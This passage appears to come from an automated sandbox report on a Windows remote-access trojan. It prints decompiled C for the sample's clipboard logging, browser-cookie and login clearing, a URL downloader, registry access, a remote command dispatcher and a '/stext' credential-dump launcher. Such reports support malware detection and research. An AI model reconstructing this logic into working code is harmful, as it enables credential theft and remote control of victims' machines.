                                              • Part of subcall function 013B7767: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,013C5664), ref: 013B77B9
                                              • Part of subcall function 013B7767: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 013B7867
                                              • Part of subcall function 013B7767: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B78AF
                                            Strings
                                            • [INFO], xrefs: 013B79A1
                                            • [Cleared browsers logins and cookies.], xrefs: 013B7977
                                            • Cleared browsers logins and cookies., xrefs: 013B798D
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@D@1@@$??1?$basic_string@Sleep$??4?$basic_string@??8std@@?c_str@?$basic_string@D@2@@0@V01@V01@@V?$basic_string@
                                            • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[INFO]
                                            • API String ID: 3797260644-945983296
                                            • Opcode ID: d2e07d151c2095a3ba934037ddae5be71297d0a21ea60f773a42fd8215794ed3
                                            • Instruction ID: 2b327f113275f60759ae6a0756b5f10cdb7eaf2ed9338af40feef9a1c9aec6d2
                                            • Opcode Fuzzy Hash: d2e07d151c2095a3ba934037ddae5be71297d0a21ea60f773a42fd8215794ed3
                                            • Instruction Fuzzy Hash: 77316660E5938C7DFB22A3BD854ABED7EB8CF9171CF0840C9D680615C6E7B51A48D352
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B6C35, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 68COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 31%
                                            			E013B6C35(void* __ecx) {
				char _v5;
				char _v24;
				char _v40;
				char* _t13;
				void* _t18;
				void* _t34;

				_t18 = __ecx;
				if(( *0x13cb8f8 & 0x00000001) == 0) {
					 *0x13cb8f8 =  *0x13cb8f8 | 0x00000001;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
					E013C3E72(E013B6CF4);
				}
				E013B6BEF(_t18,  &_v24);
				_t13 =  &_v24;
				__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t13, 0x13cb8e8);
				if(_t13 == 0) {
					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v24);
					_t13 =  &_v24;
					__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t13, 0x13c5664);
					if(_t13 != 0) {
						L013C4176();
						L013C4170();
						_t13 = E013B54E9(_t18, _t34 - 0x10,  &_v40,  &_v40, "\r\n[Following text has been copied to clipboard:]\r\n", 0x13cb8e8);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ("\r\n[End of clipboard text]\r\n", 0);
					}
				}
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t13;
			}









                                            0x013b6c45
                                            0x013b6c4c
                                            0x013b6c4e
                                            0x013b6c5b
                                            0x013b6c66
                                            0x013b6c6b
                                            0x013b6c72
                                            0x013b6c7c
                                            0x013b6c81
                                            0x013b6c8b
                                            0x013b6c93
                                            0x013b6c99
                                            0x013b6ca2
                                            0x013b6cac
                                            0x013b6cc4
                                            0x013b6cce
                                            0x013b6cd8
                                            0x013b6ce0
                                            0x013b6ce0
                                            0x013b6cac
                                            0x013b6ce9
                                            0x013b6cf3

                                            APIs
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,00000000,?,?,?,?,?,013B5AF6), ref: 013B6C5B
                                            • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,013CB8E8,?,?,00000000,00000000,?,?,?,?,?,013B5AF6), ref: 013B6C81
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,013B5AF6), ref: 013B6C93
                                            • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,013C5664,?,?,?,013B5AF6), ref: 013B6CA2
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[Following text has been copied to clipboard:],013CB8E8,[End of clipboard text]), ref: 013B6CC4
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text]), ref: 013B6CCE
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text]), ref: 013B6CE0
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,013B5AF6), ref: 013B6CE9
                                            Strings
                                            • [End of clipboard text], xrefs: 013B6CB8
                                            • [Following text has been copied to clipboard:], xrefs: 013B6CBE
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@V?$basic_string@$D@2@@0@$??1?$basic_string@Hstd@@$??0?$basic_string@??4?$basic_string@??8std@@??9std@@D@1@@D@2@@0@0@V01@V01@@V10@V10@@
                                            • String ID: [End of clipboard text]$[Following text has been copied to clipboard:]
                                            • API String ID: 1191203583-3441917614
                                            • Opcode ID: 48f4fbe1ac89d84ddb55628f86e25f831e03e8a7cf4fab4455c3ab384a8fc23e
                                            • Instruction ID: 920c42ac8ad2606cee8430c79917ca1bd3b9bc9d10c1304236e63d4afcff61f1
                                            • Opcode Fuzzy Hash: 48f4fbe1ac89d84ddb55628f86e25f831e03e8a7cf4fab4455c3ab384a8fc23e
                                            • Instruction Fuzzy Hash: 5611EC72B0030A5FCF14E6A5E98ADDF7F7CDB5575EF50002DE501A2145EB60AD098761
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013BAD6F, Relevance: 16.6, APIs: 11, Instructions: 78COMMON
                                            Download Yara Rule
                                            APIs
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 013BAD79
                                            • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6F525DF0), ref: 013BAD91
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(Function_0001B310), ref: 013BADA1
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013BADB0
                                              • Part of subcall function 013C29EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C29FA
                                              • Part of subcall function 013C29EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A11
                                              • Part of subcall function 013C29EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5), ref: 013C2A27
                                              • Part of subcall function 013C29EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 013C2A45
                                              • Part of subcall function 013C29EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A4F
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A58
                                              • Part of subcall function 013C29EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A6D
                                              • Part of subcall function 013C29EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2A7A
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2ACC
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2AD5
                                              • Part of subcall function 013C29EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013B8CD5,?), ref: 013C2ADE
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 013BADDB
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 013BADF1
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 013BAE07
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 013BAE1D
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 013BAE33
                                              • Part of subcall function 013BAE6A: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 013BAE88
                                              • Part of subcall function 013BAE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 013BAEA4
                                              • Part of subcall function 013BAE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 013BAEB4
                                              • Part of subcall function 013BAE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 013BAEC1
                                              • Part of subcall function 013BAE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 013BAED3
                                              • Part of subcall function 013BAE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BAEEB
                                              • Part of subcall function 013BAE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 013BAEFD
                                              • Part of subcall function 013BAE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BAF18
                                              • Part of subcall function 013BAE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 013BAF2A
                                              • Part of subcall function 013BAE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BAF42
                                              • Part of subcall function 013BAE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 013BAF4B
                                              • Part of subcall function 013BAE6A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,013C5628,00000000), ref: 013BAF69
                                              • Part of subcall function 013BAE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 013BAF7B
                                              • Part of subcall function 013BAE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BAF88
                                              • Part of subcall function 013BAE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 013BAF95
                                              • Part of subcall function 013B20F4: closesocket.WS2_32(013CBE70), ref: 013B20F9
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BAE56
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BAE5F
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@$D@1@@G@std@@$?length@?$basic_string@G@2@@0@Hstd@@V12@V?$basic_string@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@FileG@1@@G@2@@std@@ModuleNameV01@V10@V10@0@V10@@closesocket
                                            • String ID:
                                            • API String ID: 1795822965-0
                                            • Opcode ID: 0a1ea1fbc02f3173e0b0c940c027b186f547dcb316ff0f76d7f7cff89acf46ac
                                            • Instruction ID: d340954835af6666e9490e943adf8ba05b8193bd5d6e57ff198912d0bbc719d5
                                            • Opcode Fuzzy Hash: 0a1ea1fbc02f3173e0b0c940c027b186f547dcb316ff0f76d7f7cff89acf46ac
                                            • Instruction Fuzzy Hash: B1212F71A00109AFDB14BBB8DC6EAEE7B7CFF64315F404458E61297194EF706504C791
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C2553, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103networkfileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 88%
                                            			E013C2553(void* __ecx, void* __eflags, char* _a4, void** _a8, long _a12, signed int _a15) {
				void* _v8;
				char* _v12;
				void* _v16;
				void _v10016;
				void* _t35;
				void* _t36;
				void* _t42;
				void* _t44;
				void* _t46;
				unsigned int* _t55;
				signed int _t57;
				signed int _t58;
				signed int _t64;
				signed int _t74;
				char* _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;

				E013C3ED0(0x271c, __ecx);
				_t55 = _a12;
				_a15 = _a15 & 0x00000000;
				_t98 = 0;
				 *_a8 = 0;
				 *_t55 = 0;
				_t35 = InternetOpenA("user", 1, 0, 0, 0);
				_v16 = _t35;
				_t36 = InternetOpenUrlA(_t35, _a4, 0, 0, 0x80000000, 0);
				_v8 = _t36;
				if(_t36 != 0) {
					_a12 = 0;
					_a4 = 0;
					while(1) {
						_t42 = InternetReadFile(_v8,  &_v10016, 0x2710,  &_a12);
						if(_t42 != 0 && _a12 <= _t98) {
							break;
						}
						_t44 =  *_t55 + _a12;
						_push(_t44);
						L013C3E84();
						_t57 =  *_t55;
						_t100 = _a4;
						_t58 = _t57 >> 2;
						_v12 = memcpy(_t44, _t100, _t58 << 2);
						_push(_a4);
						_t46 = memcpy(_t100 + _t58 + _t58, _t100, _t57 & 0x00000003);
						_t101 =  &_v10016;
						_t64 = _a12 >> 2;
						memcpy(_t101 + _t64 + _t64, _t101, memcpy(_t46 +  *_t55, _t101, _t64 << 2) & 0x00000003);
						_t103 = _t103 + 0x30;
						L013C3EBE();
						_a4 = _v12;
						 *_t55 =  *_t55 + _a12;
						_t98 = 0;
					}
					_push( *_t55);
					L013C3E84();
					_t102 = _a4;
					 *_a8 = _t42;
					_t74 =  *_t55 >> 2;
					memcpy(_t102 + _t74 + _t74, _t102, memcpy(_t42, _t102, _t74 << 2) & 0x00000003);
					_a15 = 1;
				}
				InternetCloseHandle(_v16);
				InternetCloseHandle(_v8);
				return _a15;
			}






















                                            0x013c255b
                                            0x013c2564
                                            0x013c2568
                                            0x013c256c
                                            0x013c2573
                                            0x013c257a
                                            0x013c257c
                                            0x013c258d
                                            0x013c2591
                                            0x013c2599
                                            0x013c259c
                                            0x013c25a3
                                            0x013c25a6
                                            0x013c25a9
                                            0x013c25bc
                                            0x013c25c4
                                            0x00000000
                                            0x00000000
                                            0x013c25cd
                                            0x013c25d0
                                            0x013c25d1
                                            0x013c25d6
                                            0x013c25d8
                                            0x013c25df
                                            0x013c25e6
                                            0x013c25ec
                                            0x013c25ef
                                            0x013c25fa
                                            0x013c2600
                                            0x013c260a
                                            0x013c260a
                                            0x013c260c
                                            0x013c2615
                                            0x013c261b
                                            0x013c261e
                                            0x013c261e
                                            0x013c2622
                                            0x013c2624
                                            0x013c262a
                                            0x013c2632
                                            0x013c2638
                                            0x013c2642
                                            0x013c2644
                                            0x013c2648
                                            0x013c2652
                                            0x013c2657
                                            0x013c265f

                                            APIs
                                            • InternetOpenA.WININET(user,00000001,00000000,00000000,00000000), ref: 013C257C
                                            • InternetOpenUrlA.WININET(00000000,013BE1CA,00000000,00000000,80000000,00000000), ref: 013C2591
                                            • InternetReadFile.WININET(00000000,?,00002710,013C5664), ref: 013C25BC
                                            • ??2@YAPAXI@Z.MSVCRT ref: 013C25D1
                                            • ??3@YAXPAX@Z.MSVCRT ref: 013C260C
                                            • ??2@YAPAXI@Z.MSVCRT ref: 013C2624
                                            • InternetCloseHandle.WININET(?), ref: 013C2652
                                            • InternetCloseHandle.WININET(00000000), ref: 013C2657
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$??2@CloseHandleOpen$??3@FileRead
                                            • String ID: user
                                            • API String ID: 3314639739-2375276105
                                            • Opcode ID: dc501d55d33bfda813227681acc4f68ac114dba0174349a146b45d781c94b86c
                                            • Instruction ID: 367138a9c3284c8c9ce752ea265a6d9438900a26b28d1ea74722c45c51850c22
                                            • Opcode Fuzzy Hash: dc501d55d33bfda813227681acc4f68ac114dba0174349a146b45d781c94b86c
                                            • Instruction Fuzzy Hash: C8314C32A00229AFCF25DF68D854A9F7FA9FF49754F044059F909D7240CA70AE54CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C24BE, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                            Download Yara Rule
                                            APIs
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,013B1B5A,?), ref: 013C24CD
                                            • time.MSVCRT ref: 013C24E5
                                            • srand.MSVCRT ref: 013C24F2
                                            • rand.MSVCRT ref: 013C2506
                                            • rand.MSVCRT ref: 013C251A
                                            • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,013B1B5A,?), ref: 013C252D
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,013B1B5A,?), ref: 013C253D
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,013B1B5A,?), ref: 013C2546
                                            Strings
                                            • abcdefghijklmnopqrstuvwxyz, xrefs: 013C24D5
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@rand$??1?$basic_string@D@1@@V01@V01@@Y?$basic_string@srandtime
                                            • String ID: abcdefghijklmnopqrstuvwxyz
                                            • API String ID: 3357298394-1277644989
                                            • Opcode ID: 0e5e9da6a27ac3ed1d8d73df9ac23dffd43f7f3f081a194d427fdb617ab679a8
                                            • Instruction ID: 70311354770ba5ce42f611ae8eaaefe380ed732bdd07dc4bde82a72bd6616e1b
                                            • Opcode Fuzzy Hash: 0e5e9da6a27ac3ed1d8d73df9ac23dffd43f7f3f081a194d427fdb617ab679a8
                                            • Instruction Fuzzy Hash: D811CC776002199FCB15EBA1E849BEF7B7DEB90722F100016F902A71C4DA71F906CB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013BB95B, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 50COMMON
                                            Download Yara Rule
                                            APIs
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 013BB96C
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(013B32A4,?), ref: 013BB97C
                                              • Part of subcall function 013C2795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,013C35AE,?,?,?,?,?,?,?,013B969A,?,?), ref: 013C27A4
                                              • Part of subcall function 013C2795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,013C35AE,?,?,?,?,?,?,?,013B969A,?,?), ref: 013C27AE
                                              • Part of subcall function 013C2795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,013C35AE,?,?,?,?,?,?,?,013B969A,?,?), ref: 013C27B7
                                              • Part of subcall function 013C2795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,013C35AE,?,?,?,?,?,?,?,013B969A,?,?), ref: 013C27C1
                                              • Part of subcall function 013C2795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,013C35AE,?,?,?,?,?,?,?,013B969A,?,?), ref: 013C27CB
                                              • Part of subcall function 013C2795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,013C35AE,?,?,?,?,?,?,?,013B969A,?), ref: 013C27E1
                                              • Part of subcall function 013C2795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,013C35AE,?,?,?,?,?,?,?,013B969A,?,?), ref: 013C27EA
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B32A4,80000001), ref: 013BB993
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B32A4), ref: 013BB9AB
                                              • Part of subcall function 013BB9E8: RegOpenKeyExW.ADVAPI32(80000001,013BB9BA,00000000,00000002,013BB9BA,?,013BB9BA,80000001,00000000), ref: 013BB9F9
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013BB9C2
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013BB9CB
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BB9D4
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BB9DD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??1?$basic_string@$??0?$basic_string@$?begin@?$basic_string@?c_str@?$basic_string@D@1@@$?end@?$basic_string@?length@?$basic_string@G@1@@OpenV01@@
                                            • String ID: origmsc
                                            • API String ID: 643209241-68016026
                                            • Opcode ID: 07b54b5673725d761b4d9e5ea4107ce3222d5c2dfc5b743045d2d1be579ada4d
                                            • Instruction ID: 9c41acf0e04a8017a80360cb3b43cf1c2c5c4c1590bb668a02eb92a82209d9bd
                                            • Opcode Fuzzy Hash: 07b54b5673725d761b4d9e5ea4107ce3222d5c2dfc5b743045d2d1be579ada4d
                                            • Instruction Fuzzy Hash: 7D11A87290020EAFCF15EFA4E9999EEB7BDAB18315F500015E502E2154EB71BA09CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C1C4C, Relevance: 15.1, APIs: 10, Instructions: 108COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 15%
                                            			E013C1C4C(void* __eflags, intOrPtr _a4) {
				char _v20;
				void* _v36;
				char _v52;
				int _t21;
				signed int _t35;
				void* _t39;
				void* _t45;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				intOrPtr _t67;
				void* _t69;
				void* _t71;
				void* _t72;
				void* _t75;

				_t75 = __eflags;
				_t67 = _a4;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t67 + 0x18);
				_t21 = SetEvent( *(_t67 + 0x28));
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				_t71 = _t69;
				_t45 = _t71;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E013C29EB(_t75,  &_v20,  &_v52,  &E013CB310,  &_v52, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t72 = _t71 + 0x24;
				_t61 =  *_t21 - 0x61;
				if(_t61 == 0) {
					_push(E013B180C( &_v20, __eflags, 2));
					_push(E013B180C( &_v20, __eflags, 1));
					_push(E013B180C( &_v20, __eflags, 0));
					_push(_t72 - 0x10);
					E013C1D8A(E013C2881(_t29));
				} else {
					_t62 = _t61 - 0x3d;
					if(_t62 == 0) {
						E013C1A24(_t45);
					} else {
						_t63 = _t62 - 4;
						if(_t63 == 0) {
							_t35 = E013B180C( &_v20, __eflags, 0);
							__imp__??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(0);
							__eflags =  *_t35;
							E013C1B59(E013B180C( &_v20,  *_t35, 1), _t35 & 0xffffff00 | __eflags != 0x00000000);
						} else {
							_t64 = _t63 - 3;
							if(_t64 == 0) {
								_t39 =  *0x13cc1d4;
								__eflags = _t39;
								if(_t39 != 0) {
									SetEvent(_t39);
								}
							} else {
								_t65 = _t64 - 1;
								if(_t65 == 0) {
									 *0x13cc1d2 = 1;
								} else {
									if(_t65 == 1) {
										 *0x13cc1d3 = 1;
									}
								}
							}
						}
					}
				}
				E013B17DD( &_v20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}




















                                            0x013c1c4c
                                            0x013c1c53
                                            0x013c1c5e
                                            0x013c1c6d
                                            0x013c1c72
                                            0x013c1c8a
                                            0x013c1c9a
                                            0x013c1ca0
                                            0x013c1ca6
                                            0x013c1ca9
                                            0x013c1cb3
                                            0x013c1cb8
                                            0x013c1cbb
                                            0x013c1cbe
                                            0x013c1d3c
                                            0x013c1d47
                                            0x013c1d57
                                            0x013c1d58
                                            0x013c1d60
                                            0x013c1cc0
                                            0x013c1cc0
                                            0x013c1cc3
                                            0x013c1d2b
                                            0x013c1cc5
                                            0x013c1cc5
                                            0x013c1cc8
                                            0x013c1d03
                                            0x013c1d0a
                                            0x013c1d10
                                            0x013c1d22
                                            0x013c1cca
